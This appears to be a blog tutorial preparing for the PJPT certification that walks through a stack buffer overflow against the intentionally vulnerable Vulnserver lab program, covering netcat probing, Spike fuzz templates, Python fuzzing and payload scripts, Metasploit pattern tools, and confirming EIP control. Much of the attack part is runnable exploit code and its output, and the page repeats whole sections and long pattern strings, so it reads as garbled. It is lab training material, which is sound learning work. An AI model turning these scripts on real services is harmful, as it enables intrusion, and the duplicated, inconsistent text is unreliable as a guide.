Hack-01 Buffer Overflow

Hack-01 Buffer Overflow

A Simple tutorial to introduce buffer overflow hacking

A Simple tutorial to introduce buffer overflow hacking

A Simple tutorial to introduce buffer overflow hacking

A Simple tutorial to introduce buffer overflow hacking

Client

Own

Services

Own

Industries

Tech

Date

Oct 8, 2023

In this tutorial we are going to hack a machine using buffer overflow. Many thinks that it is very complicated, but TBH it’s not. I am on a journey to prepare myself for the certification in PJPT by TCM Security. And in that course this machine that we are going to hack is the second one. It took me a whole week to research and finally crack this machine. So if you are also sitting for PJPT exam real soon or if you just want to explore the step by step idea for buffer overflow, you are in the perfect place.

In this tutorial we are going to hack a machine using buffer overflow. Many thinks that it is very complicated, but TBH it’s not. I am on a journey to prepare myself for the certification in PJPT by TCM Security. And in that course this machine that we are going to hack is the second one. It took me a whole week to research and finally crack this machine. So if you are also sitting for PJPT exam real soon or if you just want to explore the step by step idea for buffer overflow, you are in the perfect place.

In this tutorial we are going to hack a machine using buffer overflow. Many thinks that it is very complicated, but TBH it’s not. I am on a journey to prepare myself for the certification in PJPT by TCM Security. And in that course this machine that we are going to hack is the second one. It took me a whole week to research and finally crack this machine. So if you are also sitting for PJPT exam real soon or if you just want to explore the step by step idea for buffer overflow, you are in the perfect place.

Step 0


Download the machine that we want to hack with buffer overflow

https://github.com/stephenbradshaw/vulnserver




Download Immunity Debugger. https://www.immunityinc.com/products/debugger/

This is awesome software. IDK how it is free. Using this you can hack EIP. Hack what now?




You know how we have a memory card? The RAM, yeah. So the RAM has different addresses. You can imagine like this, RAM as a Building and address as different apartments. In different apartments our computers store different values. 



In all apartments, we have a contract stating which apartment belongs to who. So if you have the contract, the company provides you the key! With that key you can unlock your door. In RAM we also have something called EIP- Extended Instruction Pointer. EIP has a special power. It can enable you to jump wherever you want! So it’s like the contract paper, whatever apartment number is written in that EIP for you, you can access that room only.



Now! What if you can hack the contract? Wink wink! What if we manipulate the contract and on that we write, we own the address of the OWNER OF THE COMPANY! You see where we are going with it? That means the contract will see you OWN the address where the OWNER OF THE COMPANY lives in, so it will give you the key and you can enter the OWNER’s PALACE! And once you enter the PALACE, boy o boy!



Step 0


Download the machine that we want to hack with buffer overflow

https://github.com/stephenbradshaw/vulnserver




Download Immunity Debugger. https://www.immunityinc.com/products/debugger/

This is awesome software. IDK how it is free. Using this you can hack EIP. Hack what now?




You know how we have a memory card? The RAM, yeah. So the RAM has different addresses. You can imagine like this, RAM as a Building and address as different apartments. In different apartments our computers store different values. 



In all apartments, we have a contract stating which apartment belongs to who. So if you have the contract, the company provides you the key! With that key you can unlock your door. In RAM we also have something called EIP- Extended Instruction Pointer. EIP has a special power. It can enable you to jump wherever you want! So it’s like the contract paper, whatever apartment number is written in that EIP for you, you can access that room only.



Now! What if you can hack the contract? Wink wink! What if we manipulate the contract and on that we write, we own the address of the OWNER OF THE COMPANY! You see where we are going with it? That means the contract will see you OWN the address where the OWNER OF THE COMPANY lives in, so it will give you the key and you can enter the OWNER’s PALACE! And once you enter the PALACE, boy o boy!



Step 1

Attach in Immunity Debugger



Step 2

Try connecting to this machine from kali machine



nc -nv 192.168.0.111 9999



This should connect and show what is available to connect. There should be like, STATS, TRUN etc



Step 3 (Spiking)

Try connecting to each of those (STATS, TRUN ..) with Spiking. This should tell which one is vulnerable. To connect each of those, make a separate Spike file like bellow,


s_readline();
s_string("STATS ");
s_string_variable("0");


s_readline();
s_string("TRUN ");
s_string_variable("0");



Step 4 (Fuzzing)


Now make a python file to find approx bytes for fuzzing. Something like bellow,


Fuzzing crashed at 3000 bytes


  1. For that we need a python file,


#!/usr/bin/python
import sys, socket
from time import sleep

buffer = "A" * 100

while True:

	try:
		s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		s.connect(('10.0.2.5',9999))
		s.send(('TRUN /.:/' + buffer))
		s.close()
		sleep(1)
		buffer = buffer + "A"*100

	except:

		print "Fuzzing crashed at %s bytes" % str(len(buffer))
		sys.exit()



  1. Change the mode to execution


Chmod +x 1.py




Step 4 (Finding the Offset)


After this when we can find out the approximate byte, we then have to make another python file like bellow to find the exact EIP offset



To find the exact EIP offset, we need help from metasploit, to make a long 3000 bytes character


/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000



This will give a long character like bellow,


Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9



Now make a 2.py file


#!/usr/bin/python
import sys, socket

offset = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"

try:
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('10.0.2.5',9999))
	s.send(('TRUN /.:/' + offset))
	s.close()

except:

	print "Error connecting to server"
	sys.exit()




This will fully overwrite the EIP. Now copy the EIP value from the Immunity Debugger and paste it to metasploit to find the exact offset


/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337


This will give the exact offset like bellow,

[*] Exact match at offset 2003


Now we need to verify this 2003 offset. For that create 3.py


#!/usr/bin/python
import sys, socket

shellcode = "A" * 2003 + "B" * 4 

try:

	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('192.168.0.111',9999))
	s.send(('TRUN /.:/' + shellcode))
	s.close()

except:

	print "Error connecting to server"
	sys.exit()


If EIP shows 42424242, that means 4 Bs, that means we control this EIP.

Step 1

Attach in Immunity Debugger



Step 2

Try connecting to this machine from kali machine



nc -nv 192.168.0.111 9999



This should connect and show what is available to connect. There should be like, STATS, TRUN etc



Step 3 (Spiking)

Try connecting to each of those (STATS, TRUN ..) with Spiking. This should tell which one is vulnerable. To connect each of those, make a separate Spike file like bellow,


s_readline();
s_string("STATS ");
s_string_variable("0");


s_readline();
s_string("TRUN ");
s_string_variable("0");



Step 4 (Fuzzing)


Now make a python file to find approx bytes for fuzzing. Something like bellow,


Fuzzing crashed at 3000 bytes


  1. For that we need a python file,


#!/usr/bin/python
import sys, socket
from time import sleep

buffer = "A" * 100

while True:

	try:
		s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		s.connect(('10.0.2.5',9999))
		s.send(('TRUN /.:/' + buffer))
		s.close()
		sleep(1)
		buffer = buffer + "A"*100

	except:

		print "Fuzzing crashed at %s bytes" % str(len(buffer))
		sys.exit()



  1. Change the mode to execution


Chmod +x 1.py




Step 4 (Finding the Offset)


After this when we can find out the approximate byte, we then have to make another python file like bellow to find the exact EIP offset



To find the exact EIP offset, we need help from metasploit, to make a long 3000 bytes character


/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000



This will give a long character like bellow,


Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9



Now make a 2.py file


#!/usr/bin/python
import sys, socket

